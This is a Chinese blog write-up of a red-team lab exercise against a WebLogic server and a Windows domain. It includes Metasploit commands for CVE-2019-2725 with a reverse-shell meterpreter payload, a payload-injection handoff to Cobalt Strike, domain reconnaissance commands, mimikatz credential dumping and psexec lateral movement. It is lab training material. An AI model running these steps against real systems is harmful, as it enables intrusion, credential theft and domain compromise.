【精选】ATKCK红队评估实战靶场二 (超详细过程思路)

🍬 博主介绍👨‍🎓 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~
✨主攻领域：【渗透领域】【应急响应】 【ATK&CK红队评估实战靶场】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限，欢迎各位大佬指点，相互学习进步！

一、环境搭建

1.靶场下载

靶场下载地址：
https://pan.baidu.com/s/1QlkyFALPCZADUQevFYf_2A?pwd=hqxi
提取码：hqxi

2.环境配置

1.拓朴图

pc

跟红日靶场一的环境类似需要模拟内网和外网两个网段， PC 端虚拟机相当于网关服务器，所以需要两张网卡，一个用来向外网提供web服务，一个是通向内

DC

DC在该环境中充当是域控。DC配置如下：

WEB

WEB配置：需要两块网卡，相当于网关服务器

网段配置

这里还需要把网卡VMnet1的IP段调成10.10.10.0

作者把外网网段都写成了192.168.111.1/24，所以我们可以把我们的NAT修改成111段的，所以需要将子网ip设置为192.168.111.0

网络配置完成，这三台虚拟主机默认开机密码都是：密码1qaz@WSX

注意：WEB的这台服务器，切换用户 de1ay或者管理员用户administrator，密码也是1qaz@WSX

2.查看虚拟机IP地址

DC	WEB	PC	kali
AD域		域成员	攻击机
内网:10.10.10.10	内网：10.10.10.80	内网:10.10.10.201
	外网：192.168.111.129	外网:192.168.111.130	外网:192.168.111.128

我这里的Net网卡的IP和作者的不一样，是因为我改了本地连接一的网卡配置

我把手动改成了自动的DHCP分配地址，所有外网的Net模式的IP跟作者不一样

先从WEB机开始，注意需要手动开启服务，在 C:\Oracle\Middleware\user_projects\domains\base_domain\bin 下有三个 startWeblogic 的批处理，都要挨个用管理员身份运行它即可，管理员账号密码：Administrator/1qaz@WSX

WEB机和PC机：计算机右键->管理->配置->服务->Server、Workstation、Computer Browser 全部启动

二、外网渗透

1.nmap扫描

先用nmap扫描一下

┌──(root💀kali)-[~/桌面]
└─# nmap -sS -A -p- 192.168.111.129

可以看到开启了80、135、139、445、1433、3389、7001、49152、49153、49154端口

端口开启可能存在的服务：

1.445端口开放意味着存在smb服务，可能存在ms17_010永恒之蓝漏洞

2.开放139端口，就存在Samba服务，可能存在爆破/未授权访问/远程命令执行漏洞

3.放1433端口，就存在mssql服务，可能存在爆破/注入/SA弱口令

4.开放7001端口可能存在Weblogic反序列化漏洞

2.WeblogicScan 扫描

首先看到开放了7001端口，尝试访问下

发现访问不了，所有利用WeblogicScan扫描一下

kali中是不自带WeblogicScan扫描工具的，所有要下载

git clone https://github.com/rabbitmask/WeblogicScan.gitcd WeblogicScansudo apt-get update
sudo apt-get install git

WeblogicScan扫描

┌──(root💀kali)-[~/桌面/WeblogicScan]
└─# python3 WeblogicScan.py -u 192.168.111.129 -p 7001

通过扫描发现存在SSRF CVE-2019-2725 CVE-2019-2729的漏洞

可以上网查找该漏洞的复现方法，这个漏洞还是相对比较成熟了

该漏洞的位置位于：

http://192.168.111.129:7001/uddiexplorer/SearchPublicRegistries.jsp

点击Search抓包测试
这里可以进行端口探测，这里的参数operator我们是可控的，当我们输入不同值时可得到多种不同的报错

1.端口存在返回状态码  returned a 404 error code 
2.端口不存在        but could not connect over HTTP to server 
3.非http协议       did not have a valid SOAP content-type 
4.协议没写         no protocol

当我们访问一个不存在的端口时，比如 http://127.0.0.1:4444 将会返回：could not connect over HTTP to server

3.Weblogic漏洞利用

我们首先利用msf进行查找看看CVE-2019-2725漏洞

msfconsole
search cve-2019-2725

这里进行多打几次，因为靶机有360和防火墙的原因

use 0
show options            查看一些参数
set payload windows/meterpreter/reverse_tcp  #设置攻击载荷，因为已经对方为windows系统
set rhosts 192.168.111.129
set lhost 192.168.111.128
set target 1
run

成功getshell，但是想要尝试提权，却发现失败了

getsystem

三.内网渗透

1.MSF派生CS

CS开启服务

──(root💀kali)-[~/routing/CS]
└─# ./teamserver 192.168.111.128 123456

CS开启客户端

密码就填刚刚的123456，用户可以随便填

创建一个Lisenter

msf

msf中我现在的这个meterpreter的session id为1

meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > use exploit/windows/local/payload_inject
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1
msf6 exploit(windows/local/payload_inject) > set lport 9090
lport => 9090
msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf6 exploit(windows/local/payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > run

端口要和我们cs中监听的需要一样9090

再回去cs中，发现web这台机器上线成功了

进行提权

设置延迟为0，方便后面的信息收集

在这里就可以输入命令了

2.域内信息收集

发现有双网卡，10.10.10.1/24和192.168.111.0网段，域控IP 10.10.10.10

ipconfig /all   # 查看本机ip，所在域

net user /domain    #查询域内用户

net group "domain admins" /domain   #查看域管理员用户net group "domain controllers" /domain     #查看域控：net group "domain computers" /domain  # 查看域中的其他主机名

net view
net view /domain

分别ping一下DC和PC，可以解析出主机ip地址

DC 10.10.10.10
PC 10.10.10.201

信息收集总结：

目标主机所在的网络存在域环境，域名为de1ay.com，存在两台域主机WEB和PC，域控制器为DC.de1ay.com，主机名为DC，域管理员为Administrator

WEB:192.168.111.129  内网：10.10.10.80
PC：内网：10.10.10.201
DC：内网：10.10.10.10

3.横向移动

1.portscan 端口扫描

扫描发现域控开放445端口。可以尝试psexec横向移动

2.猕猴桃抓取密码

由于weblogic启动需要域管理员密码，而本台webserver2008存在内存明文密码的漏洞故而可知域管理员账密 administrator/1qaz@WSX

3.获取域控权限

创建smb

对目标10.10.10.10(DC)进行横向移动

设置psexec

可以发现DC这台域控主机已经被拿下

PC主机跟DC一样的方法拿下

我这里中途不知道什么原因掉了

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/199658.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！